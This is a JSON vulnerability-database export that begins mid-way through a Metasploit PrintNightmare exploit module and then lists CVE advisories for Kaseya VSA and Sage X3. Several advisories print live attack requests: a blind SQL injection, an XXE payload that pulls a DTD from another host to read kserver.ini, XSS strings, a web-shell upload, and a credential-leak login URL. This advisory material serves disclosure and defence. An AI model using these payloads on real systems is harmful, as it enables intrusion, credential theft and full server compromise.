::WindowsError::NTStatus.find_by_retval(e.status_code.value).first \nmessage = \"Error #{nt_status.name} (#{nt_status.description})\" \nif nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN \n# STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected \nprint_status('The named pipe connection was broken, reconnecting...') \nreconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do \ndcerpc_bind_spoolss \nrescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e \nfalse \nelse \ntrue \nend \n \nunless reconnected \nvprint_status('Failed to reconnect to the named pipe.') \nreturn nil \nend \n \nprint_status('Successfully reconnected to the named pipe.') \nretry \nelse \nprint_error(message) \nend \n \nreturn nt_status \nend \n \nerror = ::WindowsError::Win32.find_by_retval(response.error_status.value).first \nmessage = \"RpcAddPrinterDriverEx response #{response.error_status}\" \nmessage << \" #{error.name} (#{error.description})\" unless error.nil? \nvprint_status(message) \nerror \nend \n \ndef rprn_call(name, **kwargs) \nrequest = PrintSystem.const_get(\"#{name}Request\").new(**kwargs) \n \nbegin \nraw_response = dcerpc.call(request.opnum, request.to_binary_s) \nrescue Rex::Proto::DCERPC::Exceptions::Fault => e \nfail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\") \nend \n \nPrintSystem.const_get(\"#{name}Response\").read(raw_response) \nend \n \nclass DriverInfo2Header < BinData::Record \nendian :little \n \nuint32 :c_version \nuint32 :name_offset \nuint32 :environment_offset \nuint32 :driver_path_offset \nuint32 :data_file_offset \nuint32 :config_file_offset \nend \n \n# this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2 \n# see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030 \nDriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do \ndef self.read(data) \nheader = DriverInfo2Header.read(data) \nnew( \nheader, \nRubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'), \nRubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT') \n) \nend \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/167261/cve_2021_1675_printnightmare.rb.txt"}], "cve": [{"lastseen": "2023-12-03T15:10:23", "description": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30121", "cwe": ["CWE-829"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30118", "CVE-2021-30121"], "modified": "2022-04-29T18:57:00", "cpe": [], "id": "CVE-2021-30121", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30121", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-12-03T16:25:23", "description": "Sage X3 Installation Pathname Disclosure. A specially crafted packet can elicit a response from the AdxDSrv.exe component that reveals the installation directory of the product. Note that this vulnerability can be combined with CVE-2020-7388 to achieve full RCE. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-07-22T19:15:00", "type": "cve", "title": "CVE-2020-7387", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388"], "modified": "2021-08-09T17:20:00", "cpe": [], "id": "CVE-2020-7387", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7387", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:20", "description": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /> <link id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"></link> ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30117", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117"], "modified": "2022-04-29T18:59:00", "cpe": [], "id": "CVE-2021-30117", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30117", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-03T16:25:23", "description": "Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component. By editing the client side authentication request, an attacker can bypass credential validation. While exploiting this does require knowledge of the installation path, that information can be learned by exploiting CVE-2020-7387. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 including Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T19:15:00", "type": "cve", "title": "CVE-2020-7388", "cwe": ["CWE-290"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388"], "modified": "2021-08-09T17:33:00", "cpe": [], "id": "CVE-2020-7388", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:50", "description": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword>  <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"> <!ENTITY % eval \"<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>\"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30201", "cwe": ["CWE-611"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30201"], "modified": "2022-04-29T18:14:00", "cpe": [], "id": "CVE-2021-30201", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30201", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:21", "description": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=\";</script><script>alert(1);a=\"&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30119", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30119"], "modified": "2022-04-29T18:15:00", "cpe": [], "id": "CVE-2021-30119", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30119", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:22", "description": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30120", "cwe": ["CWE-669"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30120"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:kaseya:vsa:9.5.6"], "id": "CVE-2021-30120", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30120", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:kaseya:vsa:9.5.6:*:*:*:-:*:*:*"]}, {"lastseen": "2023-12-03T16:25:25", "description": "Sage X3 Stored XSS Vulnerability on \u2018Edit\u2019 Page of User Profile. An authenticated user can pass XSS strings the \"First Name,\" \"Last Name,\" and \"Email Address\" fields of this web application component. Updates are available for on-premises versions of Version 12 (components shipped with Syracuse 12.10.0 and later) of Sage X3. Other on-premises versions of Sage X3 are unaffected or unsupported by the vendor.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-22T19:15:00", "type": "cve", "title": "CVE-2020-7390", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7390"], "modified": "2023-11-07T03:26:00", "cpe": [], "id": "CVE-2020-7390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7390", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:19", "description": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %> <%@ Import namespace=\"System.Web.UI.WebControls\" %> <%@ Import namespace=\"System.Diagnostics\" %> <%@ Import namespace=\"System.IO\" %> <%@ Import namespace=\"System\" %> <%@ Import namespace=\"System.Data\" %> <%@ Import namespace=\"System.Data.SqlClient\" %> <%@ Import namespace=\"System.Security.AccessControl\" %> <%@ Import namespace=\"System.Security.Principal\" %> <%@ Import namespace=\"System.Collections.Generic\" %> <%@ Import namespace=\"System.Collections\" %> <script runat=\"server\"> private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30118", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30118"], "modified": "2022-04-29T18:59:00", "cpe": [], "id": "CVE-2021-30118", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30118", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:20", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp When an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword This Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9) This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered --- * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact --- Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30116", "cwe": ["CWE-522"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2023-10-23T14:15:00", "cpe": [], "id": "CVE-2021-30116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-03T16:25:24", "description": "Sage X3 System CHAINE Variable Script Command Injection. An authenticated user with developer access can pass OS commands via this variable used by the web application. Note, this developer configuration should not be deployed in production.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T19:15:00", "type": "cve", "title": "CVE-2020-7389", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7389"], "modified": "2022-07-15T17:51:00", 